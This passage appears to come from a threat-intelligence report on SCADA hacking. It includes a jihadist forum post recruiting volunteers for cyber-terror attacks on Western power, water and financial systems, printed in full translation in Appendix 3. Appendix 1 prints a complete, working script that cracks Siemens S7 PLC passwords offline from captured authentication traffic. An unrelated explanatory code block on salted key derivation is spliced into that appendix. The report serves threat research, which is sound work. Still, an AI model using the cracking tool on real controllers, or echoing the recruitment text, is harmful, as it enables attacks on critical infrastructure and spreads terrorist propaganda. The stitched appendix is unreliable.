priority target, in order to destroy power, water and gas supply lines, airports, railway stations,
underground train stations, as well as central command and control systems in these three
countries. The second priority includes control systems of general financial sites, such as central
savings organizations, stock markets and major banks. Third on the group's agenda are websites and
databases of major corporations dominating the economies of these countries, while fourth and last
are less specified public sites affecting the daily routine of citizens, in order to maximize the terror
effects on the population.
Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough
understanding of SCADA systems, preferably with experience in hacking them; acquaintance with
writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in
networks, communication protocols and various kinds of routers and firewalls, specifically
mentioning CISCO; expertise in Linux or Unix operating systems; expertise in Windows operating
system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability
of entering them easily, searching for required scripts, tools, or software, and providing them to
fellow members, if asked to; complete mastery of English or French scientific language, and scientific
background in computer engineering; mastery of the Russian language; and mastery of the Chinese
language. Members who want to volunteer are asked to post a response in the thread, specifying
the categories that fit their capabilities.
To date, close to a hundred volunteers have already signed on to Mukhaddab's Electronic Jihad
group. We have yet to see indications that this newly formed group has started to engage in online
hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in
the near future.

Conclusion
The purpose of this report is to provide a thorough review of the SCADA field in major cyber arenas.
This report included information regarding malicious tools and methods for hacking SCADA systems
and a review of major cyber arenas and the practice of SCADA-related topics.
The report included an analysis of hacking tools for SCADA systems found on Chinese and Iranian
closed forums. It is clear that the SCADA field as a whole, as well as relevant vulnerabilities and
exploits, are of great interest to Chinese and Iranian hackers. The report also covered discussions on
closed hacking forums and the review of significant SCADA-related cyber incidents.
Generally speaking, we can attest that the world of SCADA hacking is becoming more and more
accessible to hackers from around the world, from Hacktivists to Cyber Criminals. In our view, both
the vendors and the users should take into account that in the next two years, the amount of
probing and research done on SCADA systems is going to be as prolific as vulnerability research on
desktops and mobile systems.

Appendix 1: Brute-Force Tool Full Script


"""
File: s7-brute-offline.py
Desc: offline password bruteforsing based on challenge-response data,
extracted from auth traffic dump file
"""
import sys
import hashlib
import hmac
from binascii import hexlify
try:
    from scapy.all import *
except ImportError:
    print "please install scapy: http://www.secdev.org/projects/scapy/ "
    sys.exit()

cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'
cfg_dictionary_file = 'dict.txt'

def get_challenge_response():
    r = rdpcap(cfg_pcap_file)
    lens = map(lambda x: x.len, r)
    pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

    # try to find challenge packet
    pckt_108 = 0 #challenge packet (from server)
    for (pckt_indx, pckt_len) in pckt_lens.items():
        if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732':
            pckt_108 = pckt_indx
            break

    # try to find response packet
    pckt_141 = 0 #response packet (from client)
    _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831':
            pckt_141 = pckt_indx
            break

    # try to find auth result packet
    pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
    pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32':
            pckt_84 = pckt_indx
            break
        if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732':
            pckt_92 = pckt_indx
            break

    print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
    if pckt_84:
        print "auth ok"
    else:
        print "auth bad. for brute we need right auth result. exit"
        sys.exit()

    challenge = None
    response = None

    raw_challenge = hexlify(r[pckt_108].load)
    if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
        challenge = raw_challenge[52:92]
        print "found challenge: %s" % challenge
    else:
        print "cannot find challenge. exit"
        sys.exit()

    raw_response = hexlify(r[pckt_141].load)
    if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
        response = raw_response[70:110]
        print "found response: %s" % response
    else:
        print "cannot find response. exit"
        sys.exit()

    return challenge, response

def calculate_s7response(password, challenge):
    challenge = challenge.decode("hex")
    return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest()

if __name__ == '__main__':
    print "using pcap file: %s" % cfg_pcap_file
    challenge, response = get_challenge_response()
    print "start password bruteforsing ..."
    for p in open(cfg_dictionary_file):
        p = p.strip()
        if response == calculate_s7response(p, challenge):
            print "found password: %s" % p
            sys.exit()
    print "password not found. try another dictionary."
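
The response computation in calculate_s7response() keys HMAC-SHA1 with an unsalted SHA-1 of the password, which is why a captured challenge/response pair is enough to check guesses offline. The added example below (not part of the report or of the tool) contrasts that derivation with an assumed salted, stretched alternative; the sample challenge, password, salts and PBKDF2 parameters are constructed for illustration and do not describe any vendor's design.

```python
import hashlib
import hmac
import os
import time

# Constructed sample values, not taken from any capture.
CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff00112233")  # 20 bytes
PASSWORD = b"constructed-example-password"


def unsalted_key(password: bytes) -> bytes:
    """Key as derived in calculate_s7response(): plain SHA-1 of the password."""
    return hashlib.sha1(password).digest()


def unsalted_response(password: bytes, challenge: bytes) -> str:
    """HMAC-SHA1 over the challenge, keyed with SHA-1(password)."""
    return hmac.new(unsalted_key(password), challenge, hashlib.sha1).hexdigest()


def stretched_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """Assumed alternative (not a vendor design): per-device salt plus PBKDF2."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations)


def stretched_response(password: bytes, salt: bytes, challenge: bytes,
                       iterations: int) -> str:
    """HMAC-SHA256 over the challenge, keyed with the stretched key."""
    key = stretched_key(password, salt, iterations)
    return hmac.new(key, challenge, hashlib.sha256).hexdigest()


def key_reuse_across_devices(iterations: int = 1000) -> dict:
    """Do two devices configured with the same password end up with one key?"""
    salt_a, salt_b = os.urandom(16), os.urandom(16)
    return {
        # The unsalted key depends on the password alone, so it is shared.
        "unsalted": unsalted_key(PASSWORD) == unsalted_key(PASSWORD),
        # Different per-device salts give different keys for the same password.
        "salted": (stretched_key(PASSWORD, salt_a, iterations)
                   == stretched_key(PASSWORD, salt_b, iterations)),
    }


def cost_ratio(iterations: int = 200_000, rounds: int = 2000) -> float:
    """CPU cost of one stretched check relative to one unsalted check."""
    start = time.perf_counter()
    for _ in range(rounds):
        unsalted_response(PASSWORD, CHALLENGE)
    per_unsalted = (time.perf_counter() - start) / rounds

    start = time.perf_counter()
    stretched_response(PASSWORD, os.urandom(16), CHALLENGE, iterations)
    per_stretched = time.perf_counter() - start
    return per_stretched / per_unsalted


if __name__ == "__main__":
    print("unsalted response:", unsalted_response(PASSWORD, CHALLENGE))
    print("key reuse:", key_reuse_across_devices())
    print("cost ratio: %.0fx" % cost_ratio())
```

Stretching raises the cost of each guess but does not remove the offline check, so limiting who can capture the authentication exchange remains part of the mitigation.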

Appendix 2: Technical Indicators for the SCADA-Related Tools
Brute-Force Tool for S-7
Tool Type: Brute-force
Tool Size: 3.3 KB
MD5: ea2ce25bed88468509f75801a03ad4a7

ScadaScan
Tool Type: Scanner, brute-force
Tool Size: 3,908 bytes
MD5: ac0ebc8b18b98639a1b1d8531db17cb2

PLCScan
Tool Type: Scanning tool
Tool Size: 3,093 bytes
MD5: be7d53a8992ba11aa715b2c9b664054f

Appendix 3: Full Translation of Yaman Mukhaddab's Message
Honestly speaking: we need male and female terrorists to start a new al-Qaeda base. This is
serious, so we wish for everyone to view it
In the Name of Allah, the Most Compassionate and Merciful
[]
Without any unnecessary introductions: it is not a joke! We need male and female terrorists, in
order to start a new al-Qaeda base which can only be started after we make sure we have the
necessary number of personnel.
Later on we will present the tasks and objectives of this base, followed by the general requirements
of the terrorists, followed by the categories of expertise required of the terrorists needed.
Whoever reads this thread and wants to volunteer must meet just two requirements:

• Absolutely consent to the general requirements.
• Choose the field fitting one's capabilities, without the slightest exaggeration. In case of any
  doubt, it is better if one underestimates one's capabilities, since an overestimation may be
  disastrous, resulting in the failure of great operations and a fellow member's efforts.

Whoever cannot meet the general requirements, or finds no field fitting his capabilities, I kindly ask
him to only pray for his fellows, taking no part in this project, no matter how enthusiastic he may be
about it. He may have many other ways to support jihad and jihadists. This is to make this thread
focused and easy to check, and to allow the advance to the next stage, by Allah's will.
I ask whoever reads the thread not to be amazed at or complain about the public manner in which
we decided to make this address, and not advise us to keep it secret. If secrecy was of any use, we
would not have resorted to publicity. We need, first of all, to make sure we have the necessary
number of male and female volunteer terrorists meeting the requirements, and this can only be
done publicly.
Likewise, to anyone arguing that some of these volunteers may be enemy agents, I say: certainly,
this is quite expected. But do not worry, since they will be eventually uncovered and suffer
unexpected blows. This may be another advantage of this project and the new terrorist base.

1. The new terrorist base's tasks and priorities:


Simply put, it is a cyber-terror base, for staunching electronic terror attacks on major infidel powers,
specifically the U.S., the U.K. and France, no others. This base is not to attack, for instance, the sites
of Shia, Christians, apostates, slanderers, liars' sites and forums, or anything else. I repeat: it will
only target the U.S., U.K. and France.
These are the targets of the future attacks, in order of priority:

• SCADA systems, in order to destroy power, water and gas supply lines, airports, railway
  stations, underground train stations, as well as central command and control systems in
  these three infidel countries, in the aforementioned order.
• Control systems of general financial sites, such as central saving organizations, stock
  markets, and major banks.
• Sites and databases of major corporations controlling the infidel countries' economy.
• Public sites affecting the citizens' daily routine, in order to maximize the terror effects on the
  population.

2. The general requirements of the male and female volunteer terrorists:

• Wholehearted devotion to Allah, reliance on Him, and absolute conviction that one's actions
  are a fight for Allah's Cause. One must never have the slightest doubt of the Islamic
  legitimacy of it, and believe this is one's personal duty, if he is capable of it.
• Keeping it secret, without ever mentioning it, not even to one's closest relatives, such as
  spouse, household, children, or parents. One should never boast of his capability,
  despite any provocations or accusations, or even if this matter is discussed in one's
  presence.
• Making time for practicing this project, and not being diverted by anything else. In case it
  interferes with other occupations, electronic Jihad should have priority, and one should vow
  this to God.
• Keeping one's promise and pledge, without any slackening, under any excuse whatsoever.
  Whoever suspects that certain matters may prevent him from doing so, he should not
  volunteer, since he has thousands of other ways to support Jihad and Jihadists, and Allah
  will reward him.
• Once a target and a tactic is selected, one may never withdraw or oppose it, or express other
  views, just get to work resolutely and forcefully, immediately carrying out any assignment,
  following all details and manner of operation, at all cost. Since he is in the battlefield, any
  retreat or slackening is just like turning his back in a day of attack.
• Finally, one must have a totally unlimited and unrestricted access to a computer with an
  Internet connection.

3. The categories and fields of capabilities required of the terrorists:


Everyone accepting the general requirements, and wants to volunteer, should choose at least one of
the following categories which totally fit one's capabilities, without the slightest overestimation of
one's capabilities. In case of any doubt, let one choose the lesser capability. Please notice that any
higher-level category does not necessarily contain all the lower-level categories.

• A proper understanding of how to hack SCADA systems.
• A proper understanding of SCADA systems, without knowledge of hacking methods.
• Acquaintance with writing hacking programs and scripts using lower-level languages such as
  Machine l a n g u a g e or Assemply l a n g u a g e [misspelling is in the original-TG]
• Absolute mastering of programming in C, C+ and C++ languages.
• A highly professional acquaintance with high-level Object Oriented programming languages.
• Expertise in networks, communication protocols, and various kinds of routers and firewalls,
  especially CISCO.
• Expertise in Linux or Unix operating systems, or both systems, and capability of easily
  operating as a system manager for a server operated by these systems.
• Expertise in Windows operating system and can easily serve as a system manager for one
  of the servers operated by these systems.
• Expertise in information-security systems.
• Proper acquaintance with testing programs and operating systems, and capability of
  detecting their security vulnerabilities.
• A proper understanding of the meaning of hacking and how to use the tools and software
  for detecting the vulnerabilities of sites such as using the available tools for hacking, but with
  no capability of making such tools.
• A proper understanding of the meaning of hacking and how it is done, but lack of knowledge
  on ways to obtain available tools, software or scripts to check a site he plans to hack. But, if
  the necessary tools are obtained, he has the capability of hacking, unaided, a website with
  any vulnerability.
• A proper understanding of the meaning of hacking and how it is done, but lack of knowledge
  on how to use the necessary tools without an explanation from another person.
• A proper acquaintance with hackers' websites, capability of entering them easily, searching
  for required scripts, tools, or software, and provide them to one's fellows, if asked for it.
• A proper understanding of the communication protocols TCP/IP on the internet, including
  the seven layers of the protocol and the way they interact, as well as subsequent services
  such as DHCP and DNS. In addition, he needs to be acquainted with the IP, but with no
  experience in hacking.
• Complete mastering of English or French scientific language and scientific background in
  computer engineering. Capability of self-learning under the proper guidance from
  publications in one of these languages, but with none of the aforementioned capabilities.
• Mastering of Russian language.
• Mastering of Chinese language.
• None of the aforementioned categories, but full, fearless, undeterred readiness, to operate
  on his PC a program provided by the terrorist base, letting it operate according to future
  orders, following them precisely, with no fear from the consequences of the program's
  operation. The program's MO shall be explained to such an operative, if he is ready to trust
  it without any doubts, and operate it following the instructions precisely.

Now, those male and female terrorists who wish to volunteer should post a response in this thread,
made of two parts, even using the copy-paste option:

• I swear to Allah that I fully accept the general conditions, and fully meet the general
  requirements. I swear, before Allah, to comply with everything.
• I fit into the following category or categories. Now copy-paste what fits your capabilities, if
  you find any.

May Allah bless all our dear supporters.


I remind everybody unwilling or unable to participate to settle for praying for his fellows.
I also remind all male and female terrorists who wish to volunteer, they must follow this thread's
contents precisely, in order to make it meet its objectives, by the will of Osama's and Ayman's Lord.
Allah masters our intentions and guides our way,
Brother Yaman Mukhaddab,
10th of Rajab 1432 AH, 11th of June 2011

Disclaimer and Limitation of Liability


Copyright and License of Product
This report (the Product) is the property of Terrogence Ltd. and is protected by Israel and international copyright law and conventions.
User acknowledges that access to the Product is limited to the License terms set forth herein and any expansion must be in writing. The
granting of the License to access and use the Product is conditioned on User's agreement not to disclose, copy, disseminate, redistribute,
or publish the Product, or any portion of or excerpts thereof to any other party.
User shall have the right to use the Product solely for its own internal information purposes. Reproduction of the Product in any form or by
any means is forbidden without Terrogence's written permission.
User agrees to maintain all copyright, trademark and other notices contained in the Product. User agrees that it shall not use Terrogence's
name or any excerpts from the Product in the promotion of its products or services.
Disclaimer of Warranties
Terrogence does not make any warranties, express or implied, including, without limitation, those of merchantability and fitness for a
particular purpose, with respect to the Product. Although Terrogence takes reasonable steps to screen the Product for infection by viruses,
worms, Trojan horses or other code manifesting contaminating or destructive properties before making the Product available, Terrogence
cannot guarantee that the Product will be free of infection. Terrogence does not make any warranties, express or implied, of whatsoever
nature with respect to the Product or to the accuracy of any conclusions set out in the Product.
Accuracy of Information
The information contained in the Product has been obtained from sources believed to be reliable and are provided by Terrogence on an
"as is" basis. To the full extent permissible by applicable law, Terrogence disclaims all warranties, express or implied, of whatsoever nature
including, but not limited to any warranties as to the accuracy, completeness, quality or adequacy of any such information, any
conclusions set out in the Product and any translations in the Product. The reader assumes sole responsibility for the selection of the
Product to achieve its intended results. The opinions expressed in the Product are subject to change at any time without notice.
Limitation of Liability
To the extent permitted under applicable law, in no event will Terrogence be liable in any way for:
1. damages of any kind, including without limitation, direct, incidental punitive, special or consequential damages (including, but
not limited to, damages for lost profits, business interruption and loss of programs or information) arising out of the use of or
inability to use the Product, or any information provided in the Product, regardless of whether or not Terrogence has been
advised of the possibility of such damages;
2. any claim attributable to errors, omissions or other inaccuracies in the Product or interpretations thereof; and
3. actions taken or not taken by any person or entity as a result of the review by such person or entity of the Product or
information contained therein or as a result of the interpretation of the Product or information contained therein by such
person or entity.
Indemnification
User agrees to indemnify, defend and hold harmless Terrogence, its affiliates, licensors, and their respective officers, directors, employees
and agents from and against all losses, expenses, damages and costs, including reasonable attorneys' fees, arising out of the use of the
Product by User or User's account.
Third Party Rights
The provisions regarding Disclaimer of Warranty, Limitation of Liability and Indemnification are for the benefit of Terrogence, and its
licensors, employees and agents. Each shall have the right to assert and enforce those provisions against a User.
General Provisions
Any provision in any memorandum received by Terrogence in connection with the Product which is inconsistent with, or adds to, the
provisions of this Agreement is void. Neither the parties' course of conduct or trade practice will modify the terms of this Agreement. If
any provision of this Agreement is determined by a court of competent jurisdiction to be invalid, all other terms and conditions shall
remain in full force and effect.
Governing Law
This Agreement and the resolution of any dispute arising hereunder shall all be governed and construed in accordance with the laws of the
state of Israel, without regard to its conflicts of law principles. User consents to the jurisdiction of the courts of Tel-Aviv.
